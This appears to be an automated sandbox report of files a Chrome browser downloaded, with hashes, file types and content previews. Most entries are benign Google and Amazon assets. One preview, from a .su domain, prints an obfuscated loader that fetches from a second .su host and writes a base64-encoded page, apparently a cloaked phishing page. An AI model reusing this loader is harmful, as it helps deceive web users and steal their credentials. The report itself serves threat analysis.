                                                                                                                                                                          Preview:<!doctype html><html lang="en" dir="ltr"><head><base href="https://ogs.google.com/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><link rel="canonical" href="https://ogs.google.com/widget/callout"><link rel="preconnect" href="https://www.gstatic.com"><link rel="preconnect" href="https://ssl.gstatic.com"><script data-id="_gd" nonce="hxbwey7m7hAETKPApyMR0A">window.WIZ_global_data = {"DpimGf":false,"EP1ykd":["/_/*"],"FdrFJe":"5985253468567600432","Im6cmf":"/_/OneGoogleWidgetUi","LVIXXb":1,"LoQv7e":true,"MT7f9b":[],"MUE6Ne":"OneGoogleWidgetUi","NrSucd":false,"OwAJ6e":false,"QrtxK":"","S06Grb":"","S6lZl":128566913,"TSDtV":"%.@.[[null,[[45459555,null,false,null,null,null,\"Imeoqb\"]],\"CAMSEB0J99WlENysuBIKgPnaBgo\\u003d\"]]]","Vvafkd":false,"Yllh3e":"%.@.1725240608941220,151693907,2604492627]","ZwjLXe":538,"cfb2h":"boq_onegooglehttpserver_20240825.03_p0","eptZe":"/_/OneGoogleWidgetUi/","fPDxwd":[48802160,93880154,97517168],"gGcLoe":false,"iCzhFc":fals
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):11965
                                                                                                                                                                          Entropy (8bit):1.3976090811693598
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:70D811667A3FCDC286F76008E0BBF8AD
                                                                                                                                                                          SHA1:8EB0C36B9939C9A0FBC48DF64B566E3A40F99C42
                                                                                                                                                                          SHA-256:B2AA9F959E8964FD6CA7679FBCC14A0D63BF747FE8BC9747F6E8CA37A6990B35
                                                                                                                                                                          SHA-512:9D7863331758836D6E5218E74076DA8952464A991D0F32C3B9F35109464E8C836184122AF527CB842D9602D373CB04D8201F24DCE4E950277FCAD7785DC3DBD4
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:{"chunkTypes":"1000011111110011110001000010110100000011111111111111111111111111111110111011111111111010111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111110111011111111131011011111111111101111111111111101111111111111111000111011111111111111111111111110101002222222212212212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212122212121212121212122212222221221221211122122112212212121222212121212121212221222222222212212121221212121212121212121121112121212122121212121212121212222222222121112222112222112121212122121212121212121121212121212121212112112121212222122212212212212221221221221221221221221221221221221221221221221221221221221221221221221221221221221221221221221221221221221221212212212222222121212212121212212112121
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (7408)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):507568
                                                                                                                                                                          Entropy (8bit):5.615143895975111
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:E76FF4E3B0ECBCA5CFC0977B84AE8427
                                                                                                                                                                          SHA1:16811DB1D3E53894B8117A24B3B51A8456C5A09D
                                                                                                                                                                          SHA-256:5CC96059E793EB879595D18C15D06B5E1D79493BE4B0963A261943867FB103A4
                                                                                                                                                                          SHA-512:54ED5E1AEBC56E8BB0BCA711DFAA7D6D6347AAB5BBBCB524A27FF7ACDDF3085AB130C90D1149C6C7E763FF2F73A760E388C3C0F5B7FC4C4551A0E8FE01432F5D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://www.google.com/xjs/_/js/k=xjs.hd.en.eJLXiQqXlJU.O/ck=xjs.hd.V_kxjztwoQ8.L.B1.O/am=AFEAAAAAAAAAAAwAAAAAAAAAAAAAAAAAAAAIAAAEAAAAAAAASAG6kwAABQBsAEAAAAAABAAIAAQIAQBEAQAAAwS4AAAEAQAUABAREAEIEgTgUSYAhIAwAQQgQAgQQAICQBCFCAAAAAMAACEADDAMQKgAYBQgAAAAAICACAAAwABqDCBAAIAegQAwAAQRAABCQAcgAAACAAWAAAENBDBABhAAAAgAAABAHwAED4BBCgsAAAAAAAAAAAAAAAQgQTAXElAQgAAAAAAAAAAAAAAAAABISRMXNg/d=0/dg=0/br=1/ujg=1/rs=ACT90oGoTKaF5FIzJywq4c_HEL0K69wpaw/m=sb_wiz,aa,abd,sytt,syts,sytn,syfx,sytr,sytd,sy101,syz7,syti,syz6,syto,sytq,sytm,syu7,sytb,syu8,syu9,syu0,syu4,sytj,syty,syu1,syu2,sytv,sytw,syte,sytf,sys4,syru,syrs,syrr,syth,syz5,syug,syuh,syuf,async,syvk,ifl,pHXghd,sf,sy1c2,sy1c5,sy4e0,sonic,TxCJfd,sy4e4,qzxzOb,IsdWVc,sy4e6,sy1gs,sy1d4,sy1d0,syrq,syro,syrp,syrn,syrm,sy4cl,sy4co,sy2ib,sy18p,sy18r,sy13l,sy13m,syrj,syrh,syfb,sybv,syby,sybt,sybx,sybw,sycp,spch,sys7,sys6,rtH1bd,sy1ea,sy19r,sy18g,syg9,sy1e9,sy13t,sy1e8,sy18h,sygb,sy1eb,SMquOb,sy8f,sygh,sygf,sygg,sygi,syge,sygp,sygn,sygl,sygd,sycm,sych,syck,syak,syac,syb6,syaj,syai,sya5,syb1,syah,syaq,sy9s,sy9r,syci,syc0,syc1,syc7,syao,syb9,syc6,sybz,sybs,sybr,syaf,syam,syc2,sybn,sybk,sybj,sybl,syae,syb7,sybe,sybc,sybg,sybd,sybf,sya9,syb4,sycr,syd6,sycs,syd7,sya7,syb3,syaa,syb5,sya6,syb2,syap,syab,sycq,sycf,sycb,sycc,sy9v,sy9z,sy9w,sya0,sy9x,sy9p,sy9m,sy9o,sya4,syc3,syg3,sygc,syg8,syg6,sy7y,sy7v,sy7x,syg5,syga,syg4,syg2,syfz,syfy,sy81,uxMpU,syft,syd1,sycz,syct,syd8,sycv,sycu,sybh,sycx,syco,sy8y,sy8x,sy8w,Mlhmy,QGR0gd,aurFic,sy97,fKUV3e,OTA3Ae,sy8g,OmgaI,EEDORb,PoEs9b,Pjplud,sy8t,sy8m,COQbmf,uY49fb,sy7s,sy7q,sy7r,sy7p,sy7o,byfTOb,lsjVmc,LEikZe,kWgXee,U0aPgd,ovKuLd,sgY6Zb,io8t5d,KG2eXe,Oj465e,sy1ef,sy1ec,syym,sysy,d5EhJe,sy1ew,fCxEDd,syvq,sy1ev,sy1eu,sy1et,sy1ep,sy1en,sy1ej,sy1el,sy1ek,sy1eo,sy1bo,sy1bh,sy18y,sy198,syvp,syxy,syxx,T1HOxc,sy1em,sy1ei,zx30Y,sy1ex,sy1er,sy1a3,Wo3n8,syus,loL8vb,syuw,syuv,syuu,ms4mZb,syqh,B2qlPe,syv3,NzU6V,sy10d,syvj,zGLm3b,sywy,sywz,sywq,DhPYme,MpJwZc,UUJqVe,sy7l,sOXFj,sy7k,s39S4,oGtAuc,NTMZac,nAFL3,sy8d,sy8c,q0xTif,y05UD,sy147,sy1dr,sy141,sy1dl,sy1dk,syxw,sy1dc,sy171,syxv,syxu,syxt,syxz,sy1dj,sy16t,sy1d8,sy16y,sy1di,sy1dd,sy1d9,sy16z,sy170,sy1dm,sy13o,sy1dh,sy1dg,sy1de,syk0,sy1df,sy1do,sy1d2,sy1da,sy1d1,sy1d7,sy1d3,sy17w,sy1db,sy1cx,sy173,sy174,syy1,syy2,epYOx?xjs=s3"
                                                                                                                                                                          Preview:_F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:relative}.nNMuOd{animation:qli-container-rotate 1568.2352941176ms linear infinite}@keyframes qli-container-rotate{from{transform:rotate(0)}to{transform:rotate(1turn)}}.RoKmhb{height:100%;opacity:0;position:absolute;width:100%}.nNMuOd .VQdeab{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-blue-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .IEqiAf{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocse{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-yellow-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .FlKbCe{animation:qli
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):29858
                                                                                                                                                                          Entropy (8bit):5.405153304317534
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:169C18943E4589BCFB844C26FBF4C141
                                                                                                                                                                          SHA1:F67BA26C16B4084795F0A9009ED84E99B21D4CD1
                                                                                                                                                                          SHA-256:562ADB7C7371A15798059F55C074C8668CBF91449B6F1DC3B30A9D71867FEEF9
                                                                                                                                                                          SHA-512:D25719401D436B77E6BE9CB53D6A33F90640846FFDC2F3640EDCFEA89B5FCB0BDD0A40ADE94C25A5CCF479560A958A8CCACDC2E1EC287E7F6DD67045430AD75E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://www.amazon.ae/hz/rhf?currentPageType=Gateway&currentSubPageType=desktop&excludeAsin=&fieldKeywords=&k=&keywords=&search=&auditEnabled=&previewCampaigns=&forceWidgets=&searchAlias=&cardJSPresent=true
                                                                                                                                                                          Preview:{"html":"\u003cdiv class\u003d\"rhf-border\"\u003e\u003cdiv id\u003d\"rhf-shoveler\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"celwidget pd_rd_w-seC2L content-id-amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_p-cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_r-D615G3GW2NVNC9Z4RFZ4 pd_rd_wg-bXTNH pd_rd_r-9fd9513b-7a41-4e48-bb71-b07e6f169701 c-f\" cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\" data-csa-op-log-render\u003d\"\" data-csa-c-content-id\u003d\"amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603\" data-csa-c-slot-id\u003d\"desktop-rvi-1\" data-csa-c-type\u003d\"widget\" data-csa-c-painter\u003d\"p13n-rvi-cards\"\u003e\u003cscript\u003eif(window.mix_csa){window.mix_csa(\u0027[cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\"]\u0027, \u0027#CardInstancehZvZl-2upXX1QNCanKgpEQ\u0027)(\u0027mark\u0027, \u0027bb\u0027)}\u003c/script\u003e\n\u003cscript\u003eif(window.uet){window.uet(\u0027bb\u0027,\u0027p13n-rvi_desktop-rvi_0\u0027,{wb: 1})}\u003c/script\u003e\n\u003cstyle\u003e.p13n-sc-rvi
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 17448, version 1.655
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):17448
                                                                                                                                                                          Entropy (8bit):7.988215424387779
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:48B83F7B9CF25C402AC0946A957F74BA
                                                                                                                                                                          SHA1:80FF7ABA37DD1FF5A6B90233A19E3A780A96DC2F
                                                                                                                                                                          SHA-256:E27466D19D5B9459F659FACA4609650719F1AA6E9ABCD5BAB91E1A3BA63AC2F0
                                                                                                                                                                          SHA-512:43CF9FB0EDFAECE5D3B3ED390C18383D7126D3551B2008FF6ACC8D37887603FAB5011DB63117496D275417C1C5326FF537011F97468ECDE2CA1973AEBB209343
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/S/sash/2SazJx$EeTHfhMN.woff2
                                                                                                                                                                          Preview:wOF2......D(..........C.........................?FFTM..8.....@.`..~.....<....6.$..F..<.. ..N..a?webf......6m....{w..V...=...f.B.8`...f...........5..1.)4(R.+..$C..t.1......OP..{......"e...OrB.t<.d..0H....V[ "PL.%C.+.x. .,....p..Z2fd..w%Q..........,..BG^...;.......Jl...[.E:......?.?D..y.m...Q.......'./VD+;I..b.:.U.-..y~n..[0....9.H.....'.lt.(..F...#E...&..&....+1>.....5..\.Y..l...8..5.5...t..P......j#....i."...Z....s't..{px.......:.R!..Kk.e...8+... ....s.sJ.......&\..........3{..j.i.u{....(..h.Z6.9[5.M....T..........$2..6.|.={....)[,.7_..gC.""b..1.a:..." -*&..$.}?.v.!.&.!.U..J&E..zs.....Y?..a.....HZ.x.....Ud.;3....X.....V...Mc&..~.n%...2........]GL...Nzea...S.hDCzH..o...\|...q..|.N.h@Z.[...c..X..... @.r.. ..B4..9........x..(9%.....rN..s..|.;..[7.]y....~u.7..E.zc..../1..M.1..b~..........I.[c.pXyC._KJ..ry.Y....a..._....j.JQ...'..9E..M..4.g......@6... 0..8.<mo..S.....`o.ED.....r...Iut...(!... A$.....""-....T.....;..( (*^......_=..+..8mQ..o.S............
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (10113), with no line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):10113
                                                                                                                                                                          Entropy (8bit):5.309639521702479
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:508D35B73808C4ABB1A2B0E006532797
                                                                                                                                                                          SHA1:78805CCBACE8EBB88B1BB8D033938ECAB4FE96AA
                                                                                                                                                                          SHA-256:EDE8EEC3286203D540A259581424D73F4FFEE7869751D3DED0D205758FBEB8C5
                                                                                                                                                                          SHA-512:F449187A024DB4E0FF1AB37F655373DB75EA53C7DF3200DB6737E0C5D514408338EC7E1DDC61EF5B1A998E64CB3BEDC7C7891934B61630FD3C9AEA08C0D4D87A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.oS1xTAEm0Kw.L.W.O/m=qcwid,d_b_gm3,d_wi_gm3,d_lo_gm3/excm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin/d=1/ed=1/ct=zgms/rs=AA2YrTut2uOtBM_spQkQSjXDMoIyrj9aPA"
                                                                                                                                                                          Preview:.gb_N{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ia{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ja{fill:#f9ab00}.gb_F .gb_Ja{fill:#fdd663}.gb_Ka>.gb_Ja{fill:#d93025}.gb_F .gb_Ka>.gb_Ja{fill:#f28b82}.gb_Ka>.gb_La{fill:white}.gb_La,.gb_F .gb_Ka>.gb_La{fill:#202124}.gb_Ma{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):282
                                                                                                                                                                          Entropy (8bit):5.1934317480703704
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:51E21E78486E0C6547B2F18AFBA8534F
                                                                                                                                                                          SHA1:87D1B1B9EF02D4AA60F37660F3E4F92C17A40595
                                                                                                                                                                          SHA-256:AD7E438805AFC18E8D2BCD10220BCAA5C27AD22DF69728579C0A51FAA6B392BF
                                                                                                                                                                          SHA-512:1867A6E041D45BC05E0EDE8805BE5C1112B98B4943B40B973AF253767C9ABE3354FCF21C8280FB137EAB9984FE7DE2075E52AD5295CA70B2858CA61512DBBF78
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://zi2oykzw.zone.investir-sur-mesure.fr/favicon.ico
                                                                                                                                                                          Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache Server at zi2oykzw.zone.investir-sur-mesure.fr Port 80</address>.</body></html>.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:GIF image data, version 89a, 64 x 64
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):8865
                                                                                                                                                                          Entropy (8bit):7.881132938956866
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:B05B81750794CA693E9589C0A171634F
                                                                                                                                                                          SHA1:FA91375275E3E1C8FCD8F79BCAE5D85593A33C67
                                                                                                                                                                          SHA-256:FF24D4B094AB1896672F4C8D387150C74BBB2493F7D01BEA7C87247AA0AB3BB5
                                                                                                                                                                          SHA-512:0C1FBBBD92EAD677C12E4B8CC40239FF66D90A899180C0816A4827F982CB45DD259D24BBC08C34FF737BDE5D3BA3638FF99CA33F77D7C0D640B6970969D3B5EB
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/G/39/personalization/ybh/loading-4x-gray._CB485916920_.gif
                                                                                                                                                                          Preview:GIF89a@.@............................!..NETSCAPE2.0.....!..XMP DataXMPa1a8-9458-1177-8dcc-94086be1eca9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.!.......,....@.@....h..#.@*)..1..`.P.v.......p...e..}...7.Zm.[....O&$..#J...HN.4%=...F`H..n..4<+g+....F...I....u.ayn=>.u.K.dTw...Ln..w..u.1c.}...u.~.I...;G`..p....]........j..-....@j.My....R...$$....R.4.p.0..........G..p..!]}....0.vxq...]..(T..`...r.. ."...Z,c.@.....P..%.c.w..t..g`...Q..p.C..+M.."fK^.r..Q.M.6...S..FE..........*...Uo....J..>.v`..+W.:.,{....i.bl{...j..(.....w=...o1.p=H..vC.]...&....;.8f\.... .T.m.....$..\.....W;F..4h&.Y..3..*.so..-B..#...Z....uB.....KAd...`.w....|x.....?.||...O..9.w.Y..O..m......x..d.~.R.To.IvI..!.......,....@.@....x....H..8.3...TP[i2Q....g...8..[..-.....+...a.fDj............8....+.....&Ue.....a.e....`.n;t@z.f........jw.\.....v?\f...(z.z........k....H.........~@...G........v.....^...H.....N......e......a..........e.....e.......W......,Pp.A........:|..2,(..c.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (5841), with CRLF line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):6214
                                                                                                                                                                          Entropy (8bit):5.8764323378372545
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:D63DD08F33D0852D2C0B053622DB67DE
                                                                                                                                                                          SHA1:8175F935B749B7E5283FA984DD4463319C054BDB
                                                                                                                                                                          SHA-256:83CBBC1CDE8E3987B8116BC8333D65CD1BA04E07CBC8283005D22D13E19355C6
                                                                                                                                                                          SHA-512:EE025F39A999A0DCC75CCB45F4ECFC1203A1A3552F351C536B82BE654683160F7CF0C3B1ACC7A166F0868E0C81116BF8532C834A5FBEC2F45C159C3DEF0D4AA9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://rsrl.ulvantiro.su/82xG/
                                                                                                                                                                          Preview:<script>fetch('https://1x7.prosolmi.su/btsscpduwdkunmmpyfiaPTSdwIRQAVIVCKVJFQQVUVUTZIZYXPOLUSMQPCIQIHNTDWDC', {..method: "GET",..}).then(response => {..return response.text()..}).then(text => {..if(text == 0){ ..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+UWljRGRkaWN3b0NlUmMweTwvdGl0bGU+DQogICAgP
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):36523
                                                                                                                                                                          Entropy (8bit):7.974571273447349
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:DBD0AE19C44E95F2563EBA303455701C
                                                                                                                                                                          SHA1:B2998EDA995170877797DB0EC3D89248FE4705E8
                                                                                                                                                                          SHA-256:32CB8DDD73086BFEDA39CD1E82553796ECC4A6BFC91804BF7897F52E66955E83
                                                                                                                                                                          SHA-512:76475ACE703FA67358D2ECB8C37DF4FA050897B96A6DD798D7D7DE573649EA39DBD49084F9DE89F428C61025220295E93D521A4FF45A15231290E0A257B001BF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/YjRlMzQ4MDct/YjRlMzQ4MDct-OTg5ZmE0ZjIt-w379._SY304_CB638059438_.jpg
                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................0.{.."..........7........................................................................@...AA.-.K..&CS..&.,.k...J.....<...@ ...|...l.2~...2...!0.&`X.2&.^K...x.3..C.9l...MH.x.U.P.1X2.. k!.q...GyL..n..!#.T....^P=.@V..&Q.4.D..).0l.,.e..a.`..{...2. L.VQD....I....0..H+.........*.;..!.P.KY.5kj.>.eP..%%.6d...G4..oK._4l/3....CwK.i......5:..A.E..{..$y.c...`.C$.AO.5..S..]E%...2%@TYT...!..N%.}.&D...Pb.F.b..).w.\.}=....U.7...\u.+.0;.1.a\...k...B........B...4.al..Er.........r.r../.x.J..5s.(..V...Q1...5.....}o.u.:.-...%.`.C....nc..:....C..j......(..}9J....t...7#i.....!..Qz].3y..*.......).......T.8n.....G..).q.s*+..w..........G..o.a...II.Rj.L.%UE..d.T....v.%k........Z.sT.....E....r.....D..Q....._6;o.IG....'..I6Tj..!L.......q.....{.....-....]m...{._@.J..;....T..k"..~.5.S:9...r|..h.u.....qv.#..A.../..G...M
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (1428)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):193335
                                                                                                                                                                          Entropy (8bit):5.4698748671072135
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:2FE075EF1B8700AE935916C6290EB97E
                                                                                                                                                                          SHA1:6279CCFACA5C64553070E21A648C1027EE1932A3
                                                                                                                                                                          SHA-256:C927A9F6D229B8D66C403FABF06FDEC70B6011D840063B39F2CC21E54AF1F160
                                                                                                                                                                          SHA-512:16940E7D82304A7139E1D8631E11F787ECDC8A1047F02A9C42493A37D38113D950BB221E52E2202224E68CC1B979B43DF039430FBA1698297ED7DF63DC538437
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.Dv_TT86KXl4.es5.O/am=QKBgwGw/d=1/excm=_b,_tp,calloutview/ed=1/dg=0/wt=2/ujg=1/rs=AM-SdHsuxqEW2z6uUf-9MJvUVpOyFk0ecQ/m=_b,_tp"
                                                                                                                                                                          Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x60a040, 0x1b3, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var ha,ra,Ha,baa,lb,rb,yb,zb,Ab,Bb,Cb,Db,Eb,Hb,daa,eaa,Jb,Lb,Tb,Wb,Yb,faa,cc,dc,ec,lc,rc,tc,vc,xc,sc,Ec,Fc,kaa,laa,Pc,Mc,Qc,maa,Xc,naa,dd,oaa,paa,qaa,od,pd,td,vd,wd,ud,Ad,Ud,Sd,Vd,z,Zd,be,fe,qe,waa,xaa,yaa,zaa,Aaa,Baa,Caa,Daa,Eaa,Faa,Gaa,Haa,bf,ff,Naa,Laa,sf,Cf,Saa,Taa,Ef,Sf,Xaa,Yaa,Xf,Zaa,$aa,aba,kg,lg,mg,bba,cba,pg,eba,fba,wg,xg,jba,lba,mba,nba,oba,pba,qba,rba,tba,uba,vba,xba,yba,aa,Pg,Qg,zba,Sg,Tg,Wg,Aba,ah,bh,ch,Dba,Eba,jh,kh,Fba,Gba;.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (501)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):676
                                                                                                                                                                          Entropy (8bit):5.171714767992367
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:6E933965CAFAEC4DEFB36AB5E2AAD9A8
                                                                                                                                                                          SHA1:8C240969FD002A6679BA28D10DB97280B8D16158
                                                                                                                                                                          SHA-256:CA0541D6E2197B0686598AF9F0A2F55643E1451B1375AA2B9650169BC2E76521
                                                                                                                                                                          SHA-512:B49F06AE8D0F77CB63167A62C5D9C5AF78D3C4B821F73CDF2A68C28E2F90A8CC68143AE483CD8598C525B7E4F05A33B3EA5D5077F72913ADAE69ADC30CA881A7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:(function(e){var d=window.AmazonUIPageJS||window.P,f=d._namespace||d.attributeErrors,a=f?f("GenericObservableJS",""):d;a.guardFatal?a.guardFatal(e)(a,window):a.execute(function(){e(a,window)})})(function(e,d,f){e.register("generic-observable",function(){return function(){var a=this,g={};a.addObserver=function(b,a){g[b]=g[b]||[];g[b].push(a)};a.removeObserver=function(b,a){b=g[b]||[];for(var c=0;c<b.length;)b[c]===a?b.splice(c,1):c++};a.notifyObservers=function(){for(var b=arguments[0],d=[],c=0;c<.arguments.length;c++)d.push(arguments[c]);b=(g[b]||[]).slice(0);for(c=0;c<b.length;c++){var f=b[c];try{f.apply(a,d)}catch(h){e.execute(function(){throw h;})}}};return a}})});
                                                                                                                                                                          No static file info